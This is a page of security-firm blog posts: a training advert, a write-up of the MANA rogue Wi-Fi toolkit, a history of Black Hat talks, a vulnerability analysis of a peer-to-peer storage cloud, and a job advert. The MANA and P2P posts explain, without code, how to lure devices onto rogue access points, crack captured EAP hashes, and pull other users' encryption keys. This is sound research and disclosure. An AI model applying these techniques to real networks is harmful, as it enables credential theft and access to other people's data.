Grey bar Blue bar
Share this:

Mon, 9 Mar 2015

Break the Web at BlackHat Singapore

Web application security training in 2015?

It's a valid question we get asked sometimes. With the amount of books available on the subject, the tools that seemingly automate the process coupled with the fact that findings bugs in web apps should be harder now that frameworks and developers are more likely to produce secure code, is there a need to still train people up in the art of application exploitation?


Our response is yes. Our application assessment course constantly changes. We look at the thousands of assessments that we perform for our customers and take those vulnerabilities discovered, new architectures and designs and try and build practical exploitation scenarios for our students. We love breaking the web, the cloud, 'the box that's hosted somewhere you can't recall but just works', as there's always new approaches and methods one can take to own the application layer.


Last month I discovered a vulnerability in Redhat's OpenStack Platform. What was cool about this vulnerability is that it's not a new class of vulnerability but when deployed in an organisation, it allows an authenticated user the ability to read files on the filesystem with the permissions of the web server. Owning organisations is all about exploiting flaws and chaining them together to achieve the end goal.


We want to teach you the same process: from learning how to own the application layer whilst having fun doing it at BlackHat Asia - Singapore.


During the course we will have a view on:


  • Introduction to the hacker mindset (more important than it sounds!)

  • Reconnaissance techniques.


...and...breaking the web...

  • Understanding and exploiting data validation issues such as SQLi, XSS, XML and LDAP injections.

  • Session Management issues...oh cookies!

  • Attacking web services.

  • Glance of client-side technologies such as Silverlight, ActiveX.


This course will be hands on. It won't just be me standing up and speaking but you learning how to own web apps and exploit common vulnerabilities just like the best.


Come and join us! It will be fun :)


/S


 


 

Mon, 23 Feb 2015

Improvements in Rogue AP attacks - MANA 1/2

At Defcon 22 we presented several improvements in wifi rogue access point attacks. We entitled the talk "Manna from heaven" and released the MANA toolkit. I'll be doing two blog entries. The first will describe the improvements made at a wifi layer, and the second will cover the network credential interception stuff. If you just want the goodies, you can get them at the end of this entry for the price of scrolling down.


Introduction


This work is about rogue access points, by which we mean a wireless access point that mimics real ones in an attempt to get users to connect to it. The initial work on this was done in 2004 by Dino dai Zovi and Shaun Macaulay. They realised that the way wifi devices probe for wireless networks that they've "remembered" happens without authentication, and that if a malicious access point merely responds to these directed probes, it can trick wireless clients into connecting to it. They called this a KARMA attack.


Additionally, Josh Wright and Brad Antoniewicz in 2008 worked out that if you man in the middle the EAP authentication on secured networks, you could crack that hash and gain access to the network yourself. They implemented this in freeradius-wpe (wireless pwnage edition).


However, KARMA attacks no longer work well, and we wanted to know why. Also, the WPE stuff seemed ripe for use in rogue access points rather than just for gaining access to the original network. This is what we implemented.


Changes in Probing


After a significant amount of time poring over radio captures of the ways in which various devices probed, and informed by our previous work on Snoopy, we realised two things. The first is that modern devices, particularly mobile ones, won't listen to directed probe responses for open, non-hidden networks if that AP didn't also/first respond to a broadcast probe. What this means is that our rogue access point needs to implement the same. However, the challenge is, what do we respond to the broadcast probe *with*?


To overcome that, we took the existing KARMA functionality built by Digininja, ported it to the latest version of hostapd and extended it to store a view of the "remembered networks" (aka the Preferred Network List (PNL)) for each device it sees. Then when hostapd-mana sees a broadcast probe from that device, it will respond with a directed probe response for each network hostapd-mana knows to be in that device's PNL. This is based on our finding, that wifi clients don't have a problem with a single BSSID (i.e. AP MAC address) to have several ESSIDs (aka SSID aka network name).


Practically, suppose there are two devices, one probing for a network foo, and the other probing for two networks bar and baz. When device1 sends a broadcast probe, hostapd-mana will respond with a directed probe response for foo to device1. Likewise when device2 sends a broadcast probe, hostapd-mana will respond with two directed probe responses to device 2, one for bar and one for baz. In addition, the "normal" KARMA functionality of responding to directed probes will also occur. Practically, we found this significantly improved the effectiveness of our rogue AP.


iOS and hidden networks


iOS presented an interesting challenge to us when it came to hidden networks. A hidden network is one configured not to broadcast its ESSID in either its beacons or broadcast probe response. Practically, the only way a client device can know if the hidden network it has remembered is nearby is by constantly sending out directed probes for the network. This is why hidden networks aren't a very good design, as their clients need to spew their names out all over the place. However, when observing iOS devices, while they could join a hidden network just fine, they seemed to not probe for it most of the time. This had us constructing faraday cages, checking other factors like BSSID and geolocation to no avail. Until we realised that iOS will not probe for any hidden networks in its PNL, unless there is at least one hidden network nearby. So, if you'd like to maximise your rogue'ing, make sure you have a hidden network nearby. It doesn't even need to be a real network; use a mifi, use airbase-ng or just create another hostapd network.


Limits in probing


Modern mobile devices probe for networks on their PNL *significantly* less than laptops or older devices do. In an ideal world, manufacturers would change the implementation to never probe for open network, and only wait for a response to a broadcast, effectively limiting these attacks to requiring pre-knowledge, common networks or being performed in the vicinity of the actual network. Actually, a patch was pushed to wpa_supplicant to limit the stupid probing behaviour Android does in low power mode a few months ago, this will make it into Android proper sometime soon. Also, iOS has significantly reduced how often it probes.


There are two ways to work around this. The first is manual; go for a common network. The rise of city-wide wifi projects makes this somewhat easy. Or if you're going for a corporate network, just do some recon and name one of your access points after that. But, we wanted to make things work better than that. The default behaviour of hostapd-mana is to build up a view of each devices PNL and only respond to broadcasts with networks specific to that device. However, we can remove that limitation and build a global PNL, and respond to each broadcast with every network every device has probed for. We call this loud mode, and it's configurable in the hostapd-mana config. This relies on the fact that many devices, particularly laptops and older mobile devices still probe for networks a lot. It also relies on the fact that many devices have networks in common (have they been in the same city, same airport, same conference, same company, same pocket etc.). This works *very* well in less crowded areas, and you'll get a much higher number of devices connecting.


However, in busy areas, or if your antenna is large enough, you'll quickly exceed the capacity for your average wifi device to respond fast enough to all of the devices, and as the number of response probes grows exponentially with each new device, even in quiet areas over time, this problem crops up (but didn't on stage at Defcon miraculously). So, it's *good enough* for now, but needs an in-kernel or in-firmware implementation with some network ageing to scale a bit better (one of the many opportunities for extending this work if you're up for some open source contribution).


Auto Crack 'n Add


freeradius-wpe is great, it provides a nice way to grab EAP hashes for clients that don't validate certificates presented via EAP's that implement SSL (PEAP, EAP-GTC, PEAL-TTLS). However, the patches are for freeradius v1 and, much like the KARMA patches for hostapd, have aged. But, hostapd contains a radius server, and so we could port the freeradius-wpe work to that, something we based off some initial but incomplete patches by Brad Antoniewicz. So hostapd-mana will also let you grab EAP hashes without needing another tool.


However, the KARMA attacks only work against open wifi networks. EAP networks are increasingly common (especially corporate ones) and we wanted to be able to have a go at getting devices probing for those to connect to our rogue AP. To do this, we modified hostapd-mana to always accept any EAP hash, but send it off for cracking. It simply writes these to a file, from which the simple python tool crackapd (included) will grab it and send it off to another process for cracking. Currently, we use asleap (also by Josh) and the rockyou password list, but these can all be easily modified. For example, to use CloudCracker and its incredibly optimised MS-CHAPv2 cracking setup.


The net result is pretty great for simple EAP hashes. The device will try and connect, and fail as we don't know enough to do the challenge response right. But after the hash is cracked, when it retries to connect (something a device will keep doing) it will succeed (and you'll have your first creds). For simple hashes, this is transparent to the user. Of course, very complex hashes will only work if you crack them in time. Worst case scenario, you leave with hashes.


Conclusion


So that's what we built into hostapd-mana. You get improved KARMA attacks, a modern hostapd version, an integrated hash stealer, and the possibility of rogue'ing some EAP networks. You can get the full toolkit at MANA toolkit on GitHub or our hostapd-mana at hostapd-mana on GitHub.


The next blog entry will cover what we did once we got a device to connect.


The Goodies


The Defcon talk:


The supporting slide deck with more information:


The final toolkit: MANA toolkit on GitHub You can also get this on Kali with "apt-get install mana-toolkit"


The modified hostapd (for hackers or people who want to build their own setup): hostapd-mana on GitHub

Sat, 1 Jun 2013

Honey, I’m home!! - Hacking Z-Wave & other Black Hat news

You've probably never thought of this, but the home automation market in the US was worth approximately $3.2 billion in 2010 and is expected to exceed $5.5 billion in 2016.


Under the hood, the Zigbee and Z-wave wireless communication protocols are the most common used RF technology in home automation systems. Zigbee is based on an open specification (IEEE 802.15.4) and has been the subject of several academic and practical security researches. Z-wave is a proprietary wireless protocol that works in the Industrial, Scientific and Medical radio band (ISM). It transmits on the 868.42 MHz (Europe) and 908.42MHz (United States) frequencies designed for low-bandwidth data communications in embedded devices such as security sensors, alarms and home automation control panels.


Unlike Zigbee, almost no public security research has been done on the Z-Wave protocol except once during a DefCon 2011 talk when the presenter pointed to the possibility of capturing the AES key exchange ... until now. Our Black Hat USA 2013 talk explores the question of Z-Wave protocol security and show how the Z-Wave protocol can be subjected to attacks.


The talk is being presented by Behrang Fouladi a Principal Security Researcher at SensePost, with some help on the hardware side from our friend Sahand Ghanoun. Behrang is one of our most senior and most respected analysts. He loves poetry, movies with Owen Wilson, snowboarding and long walks on the beach. Wait - no - that's me. Behrang's the guy who lives in London and has a Masters from Royal Holloway. He's also the guy who figured how to clone the SecureID software token.


Amazingly, this is the 11th time we've presented at Black Hat Las Vegas. We try and keep track of our talks and papers at conferences on our research services site, but for your reading convenience, here's a summary of our Black Hat talks over the last decade:



2002: Setiri : Advances in trojan technology (Roelof Temmingh)


Setiri was the first publicized trojan to implement the concept of using a web browser to communicate with its controller and caused a stir when we presented it in 2002. We were also very pleased when it got referenced by in a 2004 book by Ed Skoudis.


2003: Putting the tea back into cyber terrorism (Charl van der Walt, Roelof Temmingh and Haroon Meer)


A paper about targeted, effective, automated attacks that could be used in countrywide cyber terrorism. A worm that targets internal networks was also discussed as an example of such an attack. In some ways, the thinking in this talk eventually lead to the creation of Maltego.


2004: When the tables turn (Charl van der Walt, Roelof Temmingh and Haroon Meer)


This paper presented some of the earliest ideas on offensive strike-back as a network defence methodology, which later found their way into Neil Wyler's 2005 book "Aggressive Network Self-Defence".


2005: Assessment automation (Roelof Temmingh)


Our thinking around pentest automation, and in particular footprinting and link analyses was further expanded upon. Here we also released the first version of our automated footprinting tool - "Bidiblah".


2006: A tail of two proxies (Roelof Temmingh and Haroon Meer)


In this talk we literally did introduce two proxy tools. The first was "Suru', our HTTP MITM proxy and a then-contender to the @stake Web Proxy. Although Suru has long since been bypassed by excellent tools like "Burp Proxy" it introduced a number of exciting new concepts, including trivial fuzzing, token correlation and background directory brute-forcing. Further improvements included timing analysis and indexable directory checks. These were not available in other commercial proxies at the time, hence our need to write our own.


Another pioneering MITM proxy - WebScarab from OWASP - also shifted thinking at the time. It was originally written by Rogan Dawes, our very own pentest team leader.


The second proxy we introduced operated at the TCP layer, leveraging off the very excellent Scappy packet manipulation program. We never took that any further, however.


2007: It's all about timing (Haroon Meer and Marco Slaviero)


This was one of my favourite SensePost talks. It kicked off a series of research projects concentrating on timing-based inference attacks against all kinds of technologies and introduced a weaponized timing-based data exfiltration attack in the form of our Squeeza SQL Injection exploitation tool (you probably have to be South African to get the joke). This was also the first talk in which we Invented Our Own Acronym.


2008: Pushing a camel through the eye of a needle (Haroon Meer, Marco Slaviero & Glenn Wilkinson)


In this talk we expanded on our ideas of using timing as a vector for data extraction in so-called 'hostile' environments. We also introduced our 'reDuh' TCP-over-HTTP tunnelling tool. reDuh is a tool that can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page onto a compromised server, we can connect to hosts behind that server trivially. We also demonstrated how reDuh could be implemented under OLE right inside a compromised SQL 2005 server, even without 'sa' privileges.


2009: Clobbering the cloud (Haroon Meer, Marco Slaviero and Nicholas Arvanitis)


Yup, we did cloud before cloud was cool. This was a presentation about security in the cloud. Cloud security issues such as privacy, monoculture and vendor lock-in are discussed. The cloud offerings from Amazon, Salesforce and Apple as well as their security were examined. We got an email from Steve "Woz" Wozniak, we quoted Dan Geer and we had a photo of Dino Daizovi. We built an HTTP brute-forcer on Force.com and (best of all) we hacked Apple using an iPhone.


2010: Cache on delivery (Marco Slaviero)


This was a presentation about mining information from memcached. We introduced go-derper.rb, a tool we developed for hacking memcached servers and gave a few examples, including a sexy hack of bps.org. It seemed like people weren't getting our point at first, but later the penny dropped and we've to-date had almost 50,000 hits on the presentation on Slideshare.


2011: Sour pickles (Marco Slaviero)


Python's Pickle module provides a known capability for running arbitrary Python functions and, by extension, permitting remote code execution; however there is no public Pickle exploitation guide and published exploits are simple examples only. In this paper we described the Pickle environment, outline hurdles facing a shellcoder and provide guidelines for writing Pickle shellcode. A brief survey of public Python code was undertaken to establish the prevalence of the vulnerability, and a shellcode generator and Pickle mangler were written. Output from the paper included helpful guidelines and templates for shellcode writing, tools for Pickle hacking and a shellcode library.We also wrote a very fancy paper about it all...


We never presented at Black Hat USA in 2012, although we did do some very cool work in that year.


For this year's show we'll back on the podium with Behrang's talk, as well an entire suite of excellent training courses. To meet the likes of Behrang and the rest of our team please consider one of our courses. We need all the support we can get and we're pretty convinced you won't be disappointed.


See you in Vegas!

Fri, 12 Apr 2013

Analysis of Security in a P2P storage cloud

A cloud storage service such as Microsoft SkyDrive requires building data centers as well as operational and maintenance costs. An alternative approach is based on distributed computing model which utilizes portion of the storage and processing resources of consumer level computers and SME NAS devices to form a peer to peer storage system. The members contribute some of their local storage space to the system and in return receive "online backup and data sharing" service. Providing data confidentiality, integrity and availability in such de-centerlized storage system is a big challenge to be addressed. As the cost of data storage devices declines, there is a debate that whether the P2P storage could really be cost saving or not. I leave this debate to the critics and instead I will look into a peer to peer storage system and study its security measures and possible issues. An overview of this system's architecture is shown in the following picture:


Each node in the storage cloud receives an amount of free online storage space which can be increased by the control server if the node agrees to "contribute" some of its local hard drive space to the system. File synchronisation and contribution agents that are running on every node interact with the cloud control server and other nodes as shown in the above picture. Folder/File synchronisation is performed in the following steps:



1) The node authenticates itself to the control server and sends file upload request with file meta data including SHA1 hash value, size, number of fragments and file name over HTTPS connection.


2) The control server replies with the AES encryption key for the relevant file/folder, a [IP Address]:[Port number] list of contributing nodes called "endpoints list" and a file ID.


3) The file is split into blocks each of which is encrypted with the above AES encryption key. The blocks are further split into 64 fragments and redundancy information also gets added to them.


4) The node then connects to the contribution agent on each endpoint address that was received in step 2 and uploads one fragment to each of them


Since the system nodes are not under full control of the control server, they fall offline any time or the stored file fragments may become damaged/modified intentionally. As such, the control server needs to monitor node and fragment health regularly so that it may move lost/damaged fragments to alternate nodes if need be. For this purpose, the contribution agent on each node maintains an HTTPS connection to the control server on which it receives the following "tasks":


a) Adjust settings : instructs the node to modify its upload/download limits , contribution size and etc


b) Block check : asks the node to connect to another contribution node and verify a fragment existence and hash value


c) Block Recovery : Assist the control server to recover a number of fragments


By delegating the above task, the control system has placed some degree of "trust" or at least "assumptions" about the availability and integrity of the agent software running on the storage cloud nodes. However, those agents can be manipulated by malicious nodes in order to disrupt cloud operations, attack other nodes or even gain unauthorised access to the distributed data. I limited the scope of my research to the synchronisation and contribution agent software of two storage nodes under my control - one of which was acting as a contribution node. I didn't include the analysis of the encryption or redundancy of the system in my preliminary research because it could affect the live system and should only be performed on a test environment which was not possible to set up, as the target system's control server was not publicly available. Within the contribution agent alone, I identified that not only did I have unauthorised access file storage (and download) on the cloud's nodes, but I had unauthorised access to the folder encryption keys as well.


a) Unauthorised file storage and download


The contribution agent created a TCP network listener that processed commands from the control server as well as requests from other nodes. The agent communicated over HTTP(s) with the control server and other nodes in the cloud. An example file fragment upload request from a remote node is shown below:



Uploading fragments with similar format to the above path name resulted in the "bad request" error from the agent. This indicated that the fragment name should be related to its content and this condition is checked by the contribution agent before accepting the PUT request. By decompiling the agent software code, it was found that the fragment name must have the following format to pass this validation:


<SHA1(uploaded content)>.<Fragment number>.<Global Folder Id>


I used the above file fragment format to upload notepad.exe to the remote node successfully as you can see in the following figure:



The download request (GET request) was also successful regardless of the validity of "Global Folder Id" and "Fragment Number". The uploaded file was accessible for about 24 hours, until it was purged automatically by the contribution agent, probably because it won't receive any "Block Check" requests for the control server for this fragment. Twenty four hours still is enough time for malicious users to abuse storage cloud nodes bandwidth and storage to serve their contents over the internet without victim's knowledge.


b) Unauthorised access to folder encryption keys


The network listener responded to GET requests from any remote node as mentioned above. This was intended to serve "Block Check" commands from the control server which instructs a node to fetch a number of fragments from other nodes (referred to as "endpoints") and verify their integrity but re-calculating the SHA1 hash and reporting back to the control server. This could be part of the cloud "health check" process to ensure that the distributed file fragments are accessible and not tampered with. The agent could also process "File Recovery" tasks from the control server but I didn't observe any such command from the control server during the dynamic analysis of the contribution agent, so I searched the decompiled code for clues on the file recovery process and found the following code snippet which could suggest that the agent is cable of retrieving encryption keys from the control server. This was something odd, considering that each node should only have access to its own folders encryption keys and it stores encrypted file fragments of other nodes.


One possible explanation for the above file recovery code, could be that the node first downloads its own file fragments from remote endpoints (using an endpoint list received from the control server) and then retrieves the required folder encryption key from the control server in order to decrypt and re-assemble its own files. In order to test if it's possible to abuse the file recovery operation to gain access to encryption key of the folders belonging to other nodes. I extracted the folderInfo request format from the agent code and set up another storage node as a target to test this idea. The result of the test was successful as shown in the following figure and it was possible to retrieve the AES-256 encryption key for the Folder Id "1099869693336". This could enable an attacker who has set up an contributing storage node to decrypt the fragments that belong to other cloud users.



Conclusion:


While peer to peer storage systems have lower setup/maintenance costs, they face security threats from the storage nodes that are not under direct physical/remote control of the cloud controller system. Examples of such threats relate to the cloud's client agent software and the cloud server's authorisation control, as demonstrated in this post. While analysis of the data encryption and redundancy in the peer to peer storage system would be an interesting future research topic, we hope that the findings from this research can be used to improve the security of various distributed storage systems.

Sat, 2 Mar 2013

IT Network Packet Wrangler


As we grow and operate on a number of continents, so does our dependence on a rock-solid IT infrastructure. We are expanding our repertoire to include a greater collection of Linux/Open Source/Windows and OS X products. With this, we are on the look-out for a rock star to wrangle control of our internal networks, external cloud infrastructure and help us us utilise technology in a way to make us even better.


Job Title: IT Network Packet Wrangling Penguin Master


Salary Range: Industry standard, commensurate with experience


Location: Johannesburg/Pretoria, South Africa


Real Responsibilities:


  • Managing a growing internal network, both in ZA and UK and increased cloud-based infrastructure

  • Championing the adoption of new technologies, ways of working and being incredibly excited about security. Yes, we like that type of person who scoffs at the idea of using a plain-text protocol


As a system / network administrator your daily duties and responsibilities will include:

  • Providing day-to-day Desktop, Server and Network administration, including helping plakkers (the name we give to all who work at SensePost) with their devices

  • Be capable of using a variety of operating systems

  • Ensuring our disaster recovery plan is working as it should

  • Being the go to person to all those who require assistance with their IT

  • Maintaining and administer the telecommunications system

  • Administering the network to ensure that the systems in place run effectively and securely (we are, after all, a security company!)

  • A real passion for finding technology led solutions to problems.

  • Be excited about Unix firewalls, Cisco routers, wrangling network packets, VPN tunnelling and Wi-Fi

  • Able to hold a conversation and smile when mentioning SMTP/HTTP/IMAP/Python


Not essential, but bonus points for:

  • Actually getting a linux laptop to use an overhead projector, without resorting to swear words in Spanish and Afrikaans

  • Administering a Windows server without complaining, at all, not once, in fact, you actually kinda enjoy it.

  • Being really passionate about security and showing it doesn't have to get in the way of working productively.


If the above has got you thinking 'weird, it's like they are talking to me bru!' then we want to hear from you. Send us a carrier pigeon message or send us a mail